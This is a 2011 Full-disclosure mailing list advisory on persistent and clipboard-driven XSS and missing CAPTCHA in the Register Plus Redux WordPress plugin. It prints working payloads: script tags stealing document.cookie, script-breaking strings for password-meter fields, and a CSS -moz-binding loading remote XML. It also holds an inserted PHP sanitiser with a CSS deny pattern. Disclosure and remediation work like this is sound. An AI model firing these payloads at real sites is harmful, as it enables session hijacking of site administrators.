[Full-disclosure] XSS and IAA vulnerabilities in Register Plus Redux for WordPress
- To: <submissions@xxxxxxxxxxxxxxxxxxxxxxx>, <full-disclosure@xxxxxxxxxxxxxxxxx>
- Subject: [Full-disclosure] XSS and IAA vulnerabilities in Register Plus Redux for WordPress
- From: "MustLive" <mustlive@xxxxxxxxxxxxxxxxxx>
- Date: Sat, 31 Dec 2011 19:33:21 +0200
Hello list!
I want to warn you about multiple new vulnerabilities in the Register
Plus Redux plugin for WordPress. The latest version of the plugin was checked. This is
the second advisory concerning new vulnerabilities in Register Plus Redux.
These are Cross-Site Scripting and Insufficient Anti-automation
vulnerabilities.
-------------------------
Affected products:
-------------------------
Register Plus Redux v3.7.3.1 and previous versions are vulnerable.
At my client's request I made a new version of the plugin that fixes
all the vulnerabilities I found. I named this version Register Plus
Redux 3.8 (to distinguish it from the original version of the plugin), so
all users of this plugin can find a new and secure version of the plugin on the
Internet.
----------
Details:
----------
Persistent XSS (WASC-08):
The following vulnerabilities exist at the page
http://site/wp-admin/options-general.php?page=register-plus-redux.
In the fields Email Verification, Admin Verification, User Message (if
Custom New User Message is set), User Message (if Custom Verification Message is set),
Admin Message (if Custom Admin Notification is set), Custom Register CSS and
Custom Login CSS:
</textarea><script>alert(document.cookie)</script>
The code will execute at the page
http://site/wp-admin/options-general.php?page=register-plus-redux, and in
the case of the Email Verification and Admin Verification fields it will also execute at the
page http://site/wp-login.php?checkemail=registered.
If the following code is set in the Custom Register CSS or Custom Login CSS fields:
body {-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)}
The code will execute at the pages
http://site/wp-login.php?action=register and http://site/wp-login.php respectively. The
code works in Firefox < 3.0, but if the XML file is placed on the same site
(via the uploader), then Firefox 3.0 and higher can also be attacked.
And if the code uses expression, javascript or
vbscript in styles, then it will execute in IE.
If the following code is set in the Minimum password length field (under User Set Password)
with the options Require new users enter a password during registration and
Show password strength meter enabled:
1){}};alert(document.cookie);function a(){if(1==1
The code will execute at the page http://site/wp-login.php?action=register.
If the following code is set in the fields Empty, Short, Bad, Good, Strong or Mismatch (under
User Set Password) with the options Require new users enter a password during
registration and Show password strength meter enabled:
"};alert(document.cookie);/*
The code will execute at the page http://site/wp-login.php?action=register.
If the following code is set in the Required Fields Style Rules field:
-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml#xss)
The code will execute at the page http://site/wp-login.php?action=register. The
code works in Firefox < 3.0, but if the XML file is placed on the same site
(via the uploader), then Firefox 3.0 and higher can also be attacked.
And if the code uses expression, javascript or
vbscript in styles, then it will execute in IE.
Strictly Social XSS persistent (WASC-08):
In the above-mentioned fields User Message (if Custom New User Message is set),
User Message (if Custom Verification Message is set) and Admin Message (if
Custom Admin Notification is set), besides the XSS in the field itself, there is also XSS
via visualization (which is done via jQuery), so when a POST
request is sent the code executes twice, and each of these
vulnerabilities needs to be fixed in two places (because even escaped code will execute).
Besides an attack via sending a POST request, it is possible to conduct an XSS
attack via visualization in these three fields, and also in nine other
fields (From Email, From Name and Subject in Custom New User Message, in Custom
Verification Message and in Custom Admin Notification), by pasting XSS
code into the field.
I.e. a victim must be fraudulently induced to paste code into any of
these 12 fields; the code can be put into the victim's clipboard via an
attack via clipboard
(http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-October/008056.html).
These vulnerabilities are Strictly Social XSS
(http://websecurity.com.ua/5476/).
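As an added example that is not part of this advisory or of the plugin's own code, the output-side fixes a maintainer would apply for the three sinks described in the Persistent XSS and Strictly Social XSS sections above: option text echoed inside a textarea, option values interpolated into the inline strength-meter script, and admin-supplied CSS. The function names are assumptions; the WordPress equivalents named in the comments (esc_textarea(), absint()) are real but not used here so the block runs stand-alone.

```php
<?php
// Added example, not the plugin's code: output-side fixes for the three sinks
// named in this advisory, in plain PHP (WordPress offers esc_textarea() and
// absint() for the first two). Escaping belongs at every output point,
// including the jQuery-rendered preview, not only at the POST handler.

// (1) Option echoed inside a <textarea>: encoding "<" means a stored
//     "</textarea><script>..." can no longer close the element.
function render_textarea_option(string $name, string $value): string {
    $attr = htmlspecialchars($name, ENT_QUOTES, 'UTF-8');
    return "<textarea name=\"{$attr}\">" . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . '</textarea>';
}

// (2) Values interpolated into the inline strength-meter script: the length
//     is coerced to an int, the Empty/Short/.../Mismatch labels become JSON
//     string literals with <>&'" hex-escaped, so "};alert(...)" stays a string.
function render_strength_meter_script(string $min_length, array $labels): string {
    $min  = max(1, (int) $min_length);
    $json = json_encode(array_map('strval', $labels), JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);
    return "<script>var rprMinLen = {$min}; var rprLabels = {$json};</script>";
}

// (3) Admin CSS emitted in a <style> block: allow-list parse of
//     "selector { property: value; ... }" rules or a bare declaration list;
//     values with quotes, backslashes, angle brackets, url(), -moz-binding,
//     expression(), behavior, javascript:/vbscript: or @import are dropped.
//     Nested at-rules (e.g. @media) are dropped, keeping only the inner rules.
function sanitize_css_declarations(string $decls): string {
    $kept = [];
    foreach (explode(';', $decls) as $d) {
        $d = trim($d);
        if ($d === '' || !preg_match('/^[a-zA-Z-]+\s*:\s*[^{}<>"\'\\\\]+$/', $d)) continue;
        if (preg_match('/url\s*\(|binding|expression|behavior|javascript|vbscript|@import/i', $d)) continue;
        $kept[] = $d;
    }
    return implode('; ', $kept);
}

function sanitize_css(string $css): string {
    if (!preg_match_all('/([^{}]+)\{([^{}]*)\}/', $css, $m, PREG_SET_ORDER)) {
        return sanitize_css_declarations($css);   // bare declaration list
    }
    $rules = [];
    foreach ($m as $r) {
        $sel = trim($r[1]);
        if (!preg_match('/^[a-zA-Z0-9\s.#:_>,*\-\[\]=]+$/', $sel)) continue;
        $decls = sanitize_css_declarations($r[2]);
        if ($decls !== '') $rules[] = "{$sel} { {$decls} }";
    }
    return implode("\n", $rules);
}
```

Fed the advisory's own payload shapes, (1) returns the script as inert `&lt;/textarea&gt;...` text, (2) yields `rprMinLen = 1` and a label literal that still begins with `\u0022`, and (3) returns an empty string for the `-moz-binding:url(...)` rule while an ordinary `p { color: red }` survives.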
Insufficient Anti-automation (WASC-21):
http://site/wp-login.php?action=register
There is no protection against automated requests
(captcha) in the registration form, as in previous versions of the plugin.
------------
Timeline:
------------
2011.11.25 - found vulnerabilities.
2011.11.30 - fixed vulnerabilities.
2011.11.30 - Informed developer.
2011.11.30 - released Register Plus Redux 3.8 (with all
vulnerabilities of version 3.7.3.1 fixed).
2011.12.01 - announced at my site.
2011.12.05 - released Register Plus Redux 3.8.1 (with new features).
2011.12.31 - disclosed at my site.
I mentioned these vulnerabilities at my site:
http://websecurity.com.ua/5536/
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua